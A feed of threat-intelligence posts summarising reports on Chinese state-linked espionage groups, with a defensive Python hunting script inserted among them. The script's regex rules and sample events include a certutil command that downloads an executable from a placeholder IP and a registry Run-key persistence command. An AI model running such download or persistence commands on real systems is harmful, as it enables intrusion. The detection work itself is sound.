Weaver Ant: Tracking a China-Nexus Cyber Espionage Operation

Sygnia investigates Weaver Ant, a stealthy China-nexus threat actor targeting telecom providers. Learn how web shells enable persistence and espionage.

Sygnia

I hope everyone is having a good weekend!

The Palo Alto Networks Unit 42 research team discovered some activity that they attributed to a very stealthy and rarely seen APT, #Gelsemium. They target a diverse group of industries but use tools like #CobaltStrike, #MetaSploit, and #ChinaChopper but also used the Potato Suite that was seen as JuicyPotato.exe (who can't appreciate that?!). This was a great weekend read and I hope you all enjoy it as much as I did! Happy Hunting!

Rare Backdoors Suspected to be Tied to Gelsemium APT Found in Targeted Attack in Southeast Asian Government
https://unit42.paloaltonetworks.com/rare-possible-gelsemium-attack-targets-se-asia/

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Rare Backdoors Suspected to be Tied to Gelsemium APT Found in Targeted Attack in Southeast Asian Government

Threat activity targeting a Southeast Asian government could provide insight into the workings of APT Gelsemium. We examine the rare TTPs we observed in two attacks.

Unit 42

Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and the Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but also provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday
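The TTPs listed in the post above (LOLBin downloads via certutil/bitsadmin/PowerShell, Run-key persistence, and LSASS memory access) map directly onto hunting rules. The following is an added example, not code from the post or from the Microsoft article, that runs such rules over constructed Sysmon-style events; the field names (EventID, Image, CommandLine, TargetImage, GrantedAccess) follow Sysmon conventions and are an assumption.

```python
import re

# Hunting rules for the TTPs named in the post. Command-line rules run against
# process-creation events; the LSASS rule runs against process-access events.
RULES = {
    "lolbin_download": [
        re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I),
        re.compile(r"bitsadmin(\.exe)?\b.*/transfer", re.I),
        re.compile(r"powershell.*\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I),
    ],
    "runkey_persistence": [
        re.compile(r"reg(\.exe)?\s+add\b.*\\CurrentVersion\\Run", re.I),
    ],
}

def classify_event(event):
    """Return the set of rule names that fire on one event (Sysmon-style dict, assumed)."""
    hits = set()
    cmd = event.get("CommandLine", "")
    for name, patterns in RULES.items():
        if any(p.search(cmd) for p in patterns):
            hits.add(name)
    # Sysmon EventID 10: a process opened lsass.exe; credential dumpers need
    # PROCESS_VM_READ (0x10), so only alert when that bit is in the mask.
    if event.get("EventID") == 10 and event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        if int(event.get("GrantedAccess", "0"), 16) & 0x10:
            hits.add("lsass_access")
    return hits

def hunt(events):
    """Map each rule name to the set of hosts it fired on, for triage."""
    findings = {}
    for ev in events:
        for hit in classify_event(ev):
            findings.setdefault(hit, set()).add(ev["Computer"])
    return findings

# Constructed sample events (not taken from the article); 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/t.exe t.exe"},
    {"EventID": 1, "Computer": "WS01", "CommandLine": 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v upd /t REG_SZ /d C:\\Users\\Public\\t.exe'},
    {"EventID": 1, "Computer": "WS02", "CommandLine": "certutil.exe -hashfile C:\\setup.msi SHA256"},  # benign certutil use
    {"EventID": 10, "Computer": "SRV01", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "SRV01", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1400"},  # no VM_READ
]

if __name__ == "__main__":
    for rule, hosts in hunt(SAMPLE_EVENTS).items():
        print(f"{rule}: {sorted(hosts)}")
```

Benign certutil usage and LSASS handles without PROCESS_VM_READ are deliberately left unflagged so the rules stay usable at scale.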

Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs - Monday's CISA advisory is a staunch reminder for federal government and private sector entities to...
https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/

#microsoftexchange #networkcompromise #vulnerabilities #f5big-ipdevices #pulsesecurevpns #cve-2019-11510 #cve-2019-19781 #u.s.government #cve-2020-0688 #cve-2020-5902 #spearphishing #vulnerability #chinachopper #hacks

Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs

Monday's CISA advisory is a staunch reminder for federal government and private sector entities to apply patches for flaws in F5 BIG-IP devices, Citrix VPNs, Pulse Secure VPNs and Microsoft Exchange servers.

Threatpost - English - Global - threatpost.com